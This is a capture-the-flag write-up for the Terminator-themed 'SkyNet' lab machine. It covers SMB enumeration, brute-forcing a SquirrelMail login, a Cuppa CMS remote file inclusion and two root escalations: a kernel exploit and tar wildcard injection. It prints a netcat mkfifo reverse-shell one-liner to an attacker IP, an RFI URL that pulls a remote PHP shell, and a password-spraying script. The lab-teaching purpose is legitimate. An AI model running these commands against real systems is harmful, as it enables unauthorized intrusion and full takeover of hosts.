SkyNet

A vulnerable Terminator themed Linux machine. Are you able to compromise this Terminator themed machine?

Linux CVE RFI linPEAS

Used Commands

nmap -sV -sC -oN nmap.out -vv <target ip>
gobuster dir -u http://<target ip>:<target port> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
/usr/share/enum4linux/enum4linux.pl -a <target ip> | tee enum4linux.txt
smbclient //<target ip>/anonymous    (press Enter at the password prompt to send an empty password)
python -m http.server <webserver port>
wget http://<webserver ip>:<webserver port>/<file name>
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <atk ip> <atkport> >/tmp/f" > shell.sh

Enumeration

The task description does not give away much, so Nmap and gobuster are a good way to start. The next two steps show how I enumerated the target with Nmap and gobuster; the third step summarises what was found.

Nmap

Run: nmap -sV -sC -oN nmap.out -vv <target ip>

Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-24 20:54 UTC
NSE: Loaded 151 scripts for scanning.
...
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKeTyrvAfbRB4onlz23fmgH5DPnSz07voOYaVMKPx5bT62zn7eZzecIVvfp5LBCetcOyiw2Yhocs0oO1/RZSqXlwTVzRNKzznG4WTPtkvD7ws/4tv2cAGy1lzRy9b+361HHIXT8GNteq2mU+boz3kdZiiZHIml4oSGhI+/+IuSMl5clB5/FzKJ+mfmu4MRS8iahHlTciFlCpmQvoQFTA5s2PyzDHM6XjDYH1N3Euhk4xz44Xpo1hUZnu+P975/GadIkhr/Y0N5Sev+Kgso241/v0GQ2lKrYz3RPgmNv93AIQ4t3i3P6qDnta/06bfYDSEEJXaON+A9SCpk2YSrj4A7
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0UWS0x1ZsOGo510tgfVbNVhdE5LkzA4SWDW/5UjDumVQ7zIyWdstNAm+lkpZ23Iz3t8joaLcfs8nYCpMGa/xk=
|   256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICHVctcvlD2YZ4mLdmUlSwY8Ro0hCDMKGqZ2+DuI0KFQ
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: UIDL AUTH-RESP-CODE RESP-CODES SASL PIPELINING TOP CAPA
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        syn-ack ttl 64 Dovecot imapd
|_imap-capabilities: Pre-login more LITERAL+ have LOGINDISABLEDA0001 ID IDLE post-login SASL-IR listed ENABLE OK IMAP4rev1 LOGIN-REFERRALS capabilities
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:9D:B2:03:AA:DD (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Continue with the next step in another shell.

Gobuster

Start gobuster and let it work in parallel. I expected a different result when running the following command without a specified port, but this was not the case.

Run gobuster dir -u http://<target ip>:<target port> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.61.56:80
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/24 21:08:15 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/24 21:08:32 Finished
===============================================================

What’s in the reports?

Nmap and Gobuster show a couple of open ports and available directories. Read the reports carefully; you should be able to extract information similar to the following:

Service                  Port
Apache 2.4.18 Webserver  80
SMB                      139/445
SSH                      22
Dovecot Mailserver       110/143

Directory      Result
/admin         Forbidden
/config        Forbidden
/squirrelmail  Login
/ai            Forbidden

Further, have a look at the source code of the website. Sometimes you can spot some useful information.

Website

Open your browser and navigate to http://<target ip>

Screenshot of the website behind the webserver

I played around a little but there did not seem to be much. Then I used searchsploit in the hope of finding vulnerabilities for Apache 2.4.18 but could not find anything that helps to get a foot in the door. At this point I thought about going for the login screen at /squirrelmail, but the information was scarce, so I decided to go for SMB. Let’s go!

SMB

Use enum4linux to collect information about users and shares. Run it with the path to your enum4linux.pl script.

For me it’s /usr/share/enum4linux/enum4linux.pl -a <target ip> | tee enum4linux.txt

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.61.56
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
 ====================================
|    Session Check on 10.10.61.56    |
 ====================================
[+] Server 10.10.61.56 allows sessions using username '', password ''
...
 ============================
|    Users on 10.10.61.56    |
 ============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson       Name:   Desc:

user:[milesdyson] rid:[0x3e8]
...
 ========================================
|    Share Enumeration on 10.10.61.56    |
 ========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.61.56
//10.10.61.56/print$    Mapping: DENIED, Listing: N/A
//10.10.61.56/anonymous Mapping: OK, Listing: OK
//10.10.61.56/milesdyson        Mapping: DENIED, Listing: N/A
//10.10.61.56/IPC$      [E] Cant understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing
 ======================================================================
|    Users on 10.10.61.56 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2393614426-3774336851-1116533619
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2393614426-3774336851-1116533619 and logon username '', password ''
S-1-5-21-2393614426-3774336851-1116533619-500 *unknown*\*unknown* (8)
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\milesdyson (Local User)
...

Check the output and pick out the facts that matter to us:

Fact             Description
Anonymous Login  Yes (null session with username '' and password '')
Users            SKYNET\milesdyson (Local User)
Shares           anonymous (listable), milesdyson (access denied for now)

Let’s try to connect and see what we get!

The share of interest is anonymous; the server accepts a null session, so an empty username and an empty password are enough.

Run smbclient //<target ip>/anonymous and press Enter at the password prompt to send an empty password.

root@kali:~/Desktop# smbclient //10.10.61.56/anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Nov 26 16:04:00 2020
  ..                                  D        0  Tue Sep 17 07:20:17 2019
  attention.txt                       N      163  Wed Sep 18 03:04:59 2019
  logs                                D        0  Wed Sep 18 04:42:16 2019
                9204224 blocks of size 1024. 5788828 blocks available

Get both attention.txt and the log files in logs.

A recent system malfunction has caused various passwords to be changed.
All skynet employees are required to change their password after seeing this.
-Miles Dyson

log1.txt contains a list of passwords; log2.txt and log3.txt are empty.

The user is milesdyson and the password is one from the list. First I used Hydra and tried to brute-force SMB without success, so I chose to switch over to /squirrelmail.

SquirrelMail

Login screen showing SquirrelMail

I used BurpSuite for brute-forcing the password. If you are not familiar with Burp Suite check out this introductory room on THM BurpSuite created by DarkStar7471.

Load the password list as the payload for the password field and start the attack. You get one response per candidate; pick the one that stands out (sort by response code, and by length if the codes are all the same). Use those credentials to log in.

That’s also the password the current task is asking for.
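The Burp Intruder step above, scripted, as an added example that is not part of the original write-up or of SquirrelMail: it POSTs each candidate password to the login form and flags the one response whose status code differs from the rest. The form field names (login_username, secretkey), the mock server's success and failure codes, and the sample password list are assumptions chosen so the script runs offline against its own mock login page; point spray() at the real login URL and field names when reusing it.

```python
"""Password spraying a web login form and spotting the odd response out.

Added example for this write-up, not code from the room or from SquirrelMail.
It replays the Burp Intruder idea in plain Python: POST every candidate
password and flag the single response whose status differs from the crowd.
The mock login server below is an ASSUMPTION modelled on a typical webmail
form (success -> 302 to the inbox, failure -> 200 re-rendering the form);
a real target may use other codes, which is why the detection keys on
"different from the rest" rather than on a hard-coded status.
"""
import threading
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample data: a mock account and a tiny password list.
MOCK_USER = "milesdyson"
MOCK_SECRET = "correct-horse"          # hypothetical, not the room's password
PASSWORD_LIST = ["password", "letmein", "correct-horse", "skynet1"]


class MockLoginHandler(BaseHTTPRequestHandler):
    """Minimal login endpoint standing in for the real webmail form."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("login_username", [""])[0]
        password = form.get("secretkey", [""])[0]
        if user == MOCK_USER and password == MOCK_SECRET:
            self.send_response(302)            # success: redirect into the mailbox
            self.send_header("Location", "/src/webmail.php")
            self.end_headers()
        else:
            body = b"Unknown user or password incorrect."
            self.send_response(200)            # failure: re-render the login form
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):              # keep the console quiet
        pass


def start_mock_server():
    """Start the mock on an ephemeral port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), MockLoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx so the raw login status stays visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def try_login(url, username, password):
    """POST one credential pair and return the HTTP status code."""
    data = urllib.parse.urlencode(
        {"login_username": username, "secretkey": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    opener = urllib.request.build_opener(NoRedirect())
    try:
        with opener.open(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:    # unfollowed 3xx and 4xx land here
        return err.code


def spray(url, username, passwords):
    """Return (password, status) for the single response whose status is the outlier.

    Mirrors sorting Intruder results by status code: the most common code is
    the failure case, the odd one out is the hit. Returns None when every
    response looked the same (no candidate worked) or the result is ambiguous.
    """
    results = {pw: try_login(url, username, pw) for pw in passwords}
    common_status, _ = Counter(results.values()).most_common(1)[0]
    hits = [(pw, st) for pw, st in results.items() if st != common_status]
    return hits[0] if len(hits) == 1 else None


if __name__ == "__main__":
    server, base = start_mock_server()
    print(spray(base + "/src/redirect.php", MOCK_USER, PASSWORD_LIST))
    server.shutdown()
```

Against a real target the failure and success responses may both be redirects to different Locations; if status codes alone do not separate them, extend the key to (status, Location header, body length) and keep the same "outlier wins" logic.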

Read through the mails and find the following info:

Email  Information
1      Password for SMB
2      Binary string
3      Some strange text

Screenshot of mail 1: the first mail shows a new password that we will try.

Screenshot of mail 2: the second mail contains a string of binary digits.

Screenshot of mail 3: the third mail contains some more strange text.

Use the password in the first mail to log in using smbclient like above.

Run smbclient //<target ip>/milesdyson -U milesdyson

Enter WORKGROUP\milesdyson's password: <password from email>
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Sep 17 05:05:47 2019
  ..                                  D        0  Tue Sep 17 23:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 05:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 05:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 05:05:14 2019
  notes                               D        0  Tue Sep 17 05:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 05:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 05:05:14 2019

    9204224 blocks of size 1024. 5831472 blocks available
smb: \>

What’s the hidden directory?

Look in the notes directory and download important.txt. It names a hidden web directory:

1. Add features to beta CMS /****************
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

Nothing else on this share is useful, so it looks like a dead end. Let’s go through what we have found so far.


Quick Summary

There is SSH, SMB, an Apache Webserver, and a Dovecot MailServer. We successfully logged into SMB share anonymous and found a text file that told us that there was a malfunction causing passwords to be changed. One of the log files contained a list of passwords that we used to brute-force into SquirrelMail. We again found a password in one of the mails and successfully logged into SMB share of milesdyson. From there we found another hidden directory.

Let’s move on and enumerate the hidden directory.

For me, that part was a bit tricky because digging deeper was not my first thought about how to continue. Instead, I was looking for any options regarding SSH but then found out there wasn’t enough information to do so. Finally, I got stuck at this point and had to read another write-up to get my feet on the ground. The solution is quite simple: start over and collect more information from a different base.


Digging deeper

Navigate to that directory in your browser. There is an image of milesdyson and some text about him. The source code does not give any more information, so the only option is to dig deeper.

Run gobuster dir -u http://<target ip>/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 250

There is another directory, /administrator. Navigate there and find the login page of a CMS (Cuppa CMS, the beta CMS we already read about in the notes).

Great! We don’t have credentials to log in, but what about searchsploit? Maybe there are known exploits for this CMS.

searchsploit cuppa

You can also look up the corresponding entry on Exploit-DB and read the description there.

That answers another question of the task: what’s the vulnerability called when you can include a remote file for malicious purposes? Two thirds of the answer are in the title of the exploit you found. Search for the first word and you’ll quickly find the rest on your own.


Gain initial Reverse Shell

Read the exploit description in every detail to understand the following. The vulnerable script passes the urlConfig parameter straight into a PHP include; pulling a file from your own webserver through it only works because the target’s PHP is configured to allow URL includes (allow_url_include). If the remote include does not fetch your file, re-read the description for the alternatives it lists.

Download php-reverse-shell.php from GitHub (pentestmonkey’s), change the IP and port to your attacking machine, and save it as shell.php so the URL below matches.

  • Setup a webserver python3 -m http.server 8888.
  • Set up a Netcat listener nc -lvnp 4444.
    Use the same port that you included in php-reverse-shell.php.
  • Append alerts/alertConfigField.php?urlConfig=http://<webserver ip>:8888/shell.php on the URL of the login page http://<target ip>/45kra24zxs28v3yd/administrator/.

The URL should look like this:
http://<target ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<webserver ip>:8888/shell.php

Open that URL in your browser. The target fetches shell.php from your webserver, includes it, and the reverse shell connects back to your Netcat listener as www-data.

Extend Shell to root

Read different write-ups and you will see different approaches. A good way to start with is e.g. sudo -l or crontabs. Try both ways on your own.

Solution 1: Linux Kernel

On the attack machine (note that kernel exploits can crash an unstable target, so prefer the cron route below if you care about the box staying up):

  • Check the kernel version with uname -r: it is a 4.8 kernel.
  • Use searchsploit Linux 4.8 to look for matching local privilege escalation exploits.
  • One record’s version range covers the kernel found above.
  • Copy this exploit to your working folder with searchsploit -m 43418.c.
  • Start a webserver in that folder: python3 -m http.server 8000 (the port used in the transcript below).

On the target machine:

  • Change directory: cd /var/www/html (www-data can write there; /tmp works as well).
  • Download the file to the target from your http.server: wget http://<webserver ip>:8000/43418.c
$ wget http://10.10.48.92:8000/43418.c
--2021-04-29 11:42:36--  http://10.10.48.92:8000/43418.c
Connecting to 10.10.48.92:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24033 (23K) [text/plain]
Saving to: '43418.c'

     0K .......... .......... ...                             100% 65.5M=0s

2021-04-29 11:42:36 (65.5 MB/s) - '43418.c' saved [24033/24033]
  • Compile that file: gcc 43418.c -o privesc
  • and run ./privesc
$ gcc 43418.c -o privesc
$ ./privesc
bash: cannot set terminal process group (1290): Inappropriate ioctl for device
bash: no job control in this shell
root@skynet:/var/www/html# whoami
whoami
root
root@skynet:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)

Solution 2: Wildcards

This way is quite interesting! For further reading, search for "tar wildcard privilege escalation".

A root cron job on the target archives /var/www/html with tar and a bare * wildcard. The shell expands * to every file name in that directory, and GNU tar accepts options anywhere on its command line, so a file literally named --checkpoint=1 is parsed as an option instead of being archived. Since www-data can write to /var/www/html, three files are enough to make root’s tar run our command:

  • a file whose name tells tar to stop at a checkpoint (--checkpoint=1)
  • a file whose name tells tar what to execute at that checkpoint (--checkpoint-action=exec=sh shell.sh)
  • and finally the script that gets executed, shell.sh
cd /var/www/html
touch "/var/www/html/--checkpoint=1"
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <atk ip> <atkport> >/tmp/f" > shell.sh

Start a Netcat listener on the attacker machine with nc -lvnp <atkport> (the same port you put in shell.sh) and wait for the cron job to run again; the shell that arrives is root’s.
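To see the mechanism without touching the target, here is an added example (not from the write-up or the room) that reproduces the injection locally in Python: it creates the same three files, runs a tar command line the way a cron job would, and reports whether the planted shell.sh executed, next to two safe spellings of the same backup command. The scratch directory layout, the backup command lines and the `touch pwned` payload are assumptions standing in for the target’s cron job and the reverse shell.

```python
"""GNU tar wildcard injection reproduced locally, beside the hardened command.

Added example for this write-up, not code from the room. The injected command
only drops a marker file instead of a reverse shell, so it is safe to run
anywhere GNU tar is installed. The "backup job" command lines and the scratch
directory are ASSUMPTIONS standing in for the target's root cron job.
"""
import os
import shutil
import subprocess
import tempfile


def gnu_tar_available():
    """--checkpoint-action is GNU tar specific; bsdtar and busybox tar lack it."""
    try:
        out = subprocess.run(["tar", "--version"], capture_output=True, text=True)
    except FileNotFoundError:
        return False
    return "GNU tar" in out.stdout


def make_site_dir(root):
    """Populate root/site with the same three files the write-up plants.

    An ordinary file is added so the directory looks like real web content.
    """
    site = os.path.join(root, "site")
    os.mkdir(site)
    # Empty files whose NAMES are tar options. The shell expands `*` to them
    # and GNU tar accepts options anywhere in argv, so they are obeyed.
    open(os.path.join(site, "--checkpoint=1"), "w").close()
    open(os.path.join(site, "--checkpoint-action=exec=sh shell.sh"), "w").close()
    # What tar runs at the checkpoint: a reverse shell in the room, a harmless
    # marker here so the effect is observable.
    with open(os.path.join(site, "shell.sh"), "w") as f:
        f.write("touch pwned\n")
    open(os.path.join(site, "index.html"), "w").close()
    return site


def run_backup(cmdline):
    """Run one backup command line via sh (so `*` is globbed), from inside site/.

    Returns True if the planted shell.sh executed, i.e. the marker appeared.
    """
    root = tempfile.mkdtemp(prefix="wildcard-")
    try:
        site = make_site_dir(root)
        subprocess.run(cmdline, shell=True, cwd=site,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return os.path.exists(os.path.join(site, "pwned"))
    finally:
        shutil.rmtree(root, ignore_errors=True)


def demo():
    """Compare the vulnerable job with two safe spellings; return each outcome."""
    return {
        "gnu_tar": gnu_tar_available(),
        # Vulnerable: bare `*`, so file names can turn into options.
        "bare_glob": run_backup("tar cf ../backup.tar *"),
        # Safe: `--` ends option parsing; everything after it is a file name.
        "double_dash": run_backup("tar cf ../backup.tar -- *"),
        # Safe: `./*` prefixes every name, so none begins with a dash.
        "dot_slash": run_backup("tar cf ../backup.tar ./*"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:12} {value}")
```

The two safe variants are the fix to recommend when you find such a job during a review: any script that globs untrusted directory contents into a command line must either terminate option parsing with `--` or anchor the names with `./`.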

Congrats! You are root! Now locate the root flag and finish that room.